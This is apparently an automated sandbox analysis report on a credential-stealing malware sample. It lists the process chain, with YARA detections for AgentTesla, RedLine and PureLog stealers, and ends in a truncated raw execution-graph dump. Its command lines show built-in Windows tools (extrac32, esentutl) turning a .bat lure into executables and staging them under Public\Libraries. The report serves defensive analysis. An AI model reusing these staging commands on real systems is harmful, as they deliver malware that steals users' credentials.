                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:03:34:56
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                            Imagebase:0x7ff670c10000
                                                                                            File size:35'328 bytes
                                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:03:34:56
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'138'688 bytes
                                                                                            MD5 hash:08C4AFC4A714EDFE9F2554B72DA40A04
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Antivirus matches:
                                                                                            • Detection: 32%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:03:35:00
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" "
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:03:35:00
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:03:35:01
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                            Imagebase:0x860000
                                                                                            File size:352'768 bytes
                                                                                            MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:03:35:01
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o
                                                                                            Imagebase:0x860000
                                                                                            File size:352'768 bytes
                                                                                            MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:03:35:01
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:03:35:01
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            Imagebase:0x400000
                                                                                            File size:68'096 bytes
                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            Antivirus matches:
                                                                                            • Detection: 3%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:03:35:10
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\Public\Libraries\Cllyjbrx.PIF
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\Public\Libraries\Cllyjbrx.PIF"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'138'688 bytes
                                                                                            MD5 hash:08C4AFC4A714EDFE9F2554B72DA40A04
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:Borland Delphi
                                                                                            Antivirus matches:
                                                                                            • Detection: 32%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:03:35:12
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            Imagebase:0x400000
                                                                                            File size:68'096 bytes
                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.2004085524.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:13
                                                                                            Start time:03:35:18
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:68'096 bytes
                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 3%, ReversingLabs
                                                                                            Has exited:true

                                                                                            Target ID:16
                                                                                            Start time:03:35:26
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\Public\Libraries\Cllyjbrx.PIF
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\Public\Libraries\Cllyjbrx.PIF"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'138'688 bytes
                                                                                            MD5 hash:08C4AFC4A714EDFE9F2554B72DA40A04
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:Borland Delphi
                                                                                            Has exited:true

                                                                                            Target ID:17
                                                                                            Start time:03:35:29
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            Imagebase:0x400000
                                                                                            File size:68'096 bytes
                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000002.2918780561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000001.1996288631.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            Has exited:false

                                                                                            Target ID:18
                                                                                            Start time:03:35:35
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:68'096 bytes
                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true


                                                                                              Execution Graph

                                                                                              Execution Coverage:15.8%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:4%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:25
                                                                                              [Execution graph data: the raw node/edge listing of the call graph (node IDs, code addresses in the 0x31c0000-0x31f0000 range and "N API calls" edge labels) is not reproduced here. Windows API calls named in the graph nodes include: Sleep, VirtualAlloc, VirtualFree, LocalAlloc, TlsSetValue, TlsGetValue, SysAllocStringLen, SysReAllocStringLen, SysFreeString, lstrcpynA, lstrlenA, CharNextA, GetThreadLocale, GetLocaleInfoA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleW, GetProcAddress, LoadLibraryExA, LoadLibraryW, FreeLibrary, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, GetStdHandle, WriteFile, MessageBoxA, ExitProcess, timeSetEvent, GetMessageA, TranslateMessage, DispatchMessageA, QueryPerformanceCounter, InetIsOffline, RtlDosPathNameToNtPathName_U, NtCreateFile, NtWriteFile, NtClose, NtWriteVirtualMemory, FlushInstructionCache, CreateProcessAsUserW, WaitForSingleObject, CloseHandle.]
35769 31e0978 35768->35769 35770 31d89d0 20 API calls 35769->35770 35771 31e0984 35770->35771 35772 31de0f8 11 API calls 35771->35772 35773 31e0994 35772->35773 35774 31c4530 11 API calls 35773->35774 35775 31e09a4 35774->35775 35776 31c4860 11 API calls 35775->35776 35777 31e09c5 35776->35777 35778 31e09d0 35777->35778 35779 31c47ec 11 API calls 35778->35779 35780 31e09fc 35779->35780 35781 31e0a07 35780->35781 35782 31e0a14 35781->35782 35783 31d89d0 20 API calls 35782->35783 35784 31e0a20 35783->35784 35785 31c4860 11 API calls 35784->35785 35786 31e0a41 35785->35786 35787 31e0a4c 35786->35787 35788 31c47ec 11 API calls 35787->35788 35789 31e0a78 35788->35789 35790 31e0a83 35789->35790 35791 31e0a90 35790->35791 35792 31d89d0 20 API calls 35791->35792 35793 31e0a9c 35792->35793 35794 31c4860 11 API calls 35793->35794 35795 31e0abd 35794->35795 35796 31e0ac8 35795->35796 35797 31c46d4 35796->35797 35798 31e0ad5 35797->35798 35799 31c47ec 11 API calls 35798->35799 35800 31e0af4 35799->35800 35801 31e0aff 35800->35801 35802 31e0b0c 35801->35802 35803 31d89d0 20 API calls 35802->35803 35804 31e0b18 35803->35804 35805 31c49a0 35804->35805 35806 31e0b22 35805->35806 35807 31e0b2f 35806->35807 35808 31c7e5c GetFileAttributesA 35807->35808 35809 31e0b3a 35808->35809 35810 31e12fe 35809->35810 35811 31e0b42 35809->35811 35812 31c4860 11 API calls 35810->35812 35813 31c4860 11 API calls 35811->35813 35814 31e131f 35812->35814 35815 31e0b63 35813->35815 35817 31e1337 35814->35817 35816 31e0b7b 35815->35816 35818 31c47ec 11 API calls 35816->35818 35819 31c47ec 11 API calls 35817->35819 35820 31e0b9a 35818->35820 35821 31e1356 35819->35821 35823 31e0bb2 35820->35823 35822 31e1361 35821->35822 35824 31d89d0 20 API calls 35822->35824 35825 31d89d0 20 API calls 35823->35825 35826 31e137a 35824->35826 35827 31e0bbe 35825->35827 35828 31c4860 11 API calls 35826->35828 35829 31c4860 11 API calls 35827->35829 35830 31e139b 35828->35830 35831 31e0bdf 35829->35831 35832 31e13b3 
35830->35832 35833 31e0bf7 35831->35833 35835 31c47ec 11 API calls 35832->35835 35834 31c47ec 11 API calls 35833->35834 35836 31e0c16 35834->35836 35837 31e13d2 35835->35837 35838 31e0c2e 35836->35838 35839 31e13dd 35837->35839 35841 31d89d0 20 API calls 35838->35841 35840 31d89d0 20 API calls 35839->35840 35842 31e13f6 35840->35842 35843 31e0c3a 35841->35843 35844 31c4860 11 API calls 35842->35844 35845 31c4860 11 API calls 35843->35845 35846 31e1417 35844->35846 35847 31e0c5b 35845->35847 35850 31e1422 35846->35850 35848 31c49a0 35847->35848 35849 31e0c66 35848->35849 35852 31c47ec 11 API calls 35849->35852 35851 31c47ec 11 API calls 35850->35851 35853 31e144e 35851->35853 35854 31e0c92 35852->35854 35855 31c49a0 35853->35855 35856 31e0c9d 35854->35856 35857 31e1459 35855->35857 35858 31c46d4 35856->35858 35859 31e1466 35857->35859 35860 31e0caa 35858->35860 35861 31d89d0 20 API calls 35859->35861 35862 31d89d0 20 API calls 35860->35862 35863 31e1472 35861->35863 35864 31e0cb6 35862->35864 37848 31c4de0 35863->37848 35866 31c4de0 35864->35866 35868 31e0cc7 35866->35868 38320 31ddd70 35868->38320 35874 31c4530 11 API calls 35876 31e0ce8 35874->35876 35878 31c4860 11 API calls 35876->35878 35880 31e0d09 35878->35880 35881 31e0d14 35880->35881 35882 31c46d4 35881->35882 35883 31e0d21 35882->35883 35885 31c47ec 11 API calls 35883->35885 35887 31e0d40 35885->35887 35891 31e0d4b 35887->35891 35892 31c46d4 35891->35892 35893 31e0d58 35892->35893 35895 31d89d0 20 API calls 35893->35895 35897 31e0d64 35895->35897 35899 31c4860 11 API calls 35897->35899 35901 31e0d85 35899->35901 35902 31e0d90 35901->35902 35903 31e0d9d 35902->35903 35905 31c47ec 11 API calls 35903->35905 35907 31e0dbc 35905->35907 35910 31e0dc7 35907->35910 35913 31c46d4 35910->35913 35915 31e0dd4 35913->35915 35917 31d89d0 20 API calls 35915->35917 35919 31e0de0 35917->35919 35921 31c4860 11 API calls 35919->35921 35923 31e0e01 35921->35923 35925 31c49a0 35923->35925 35926 31e0e0c 35925->35926 35927 
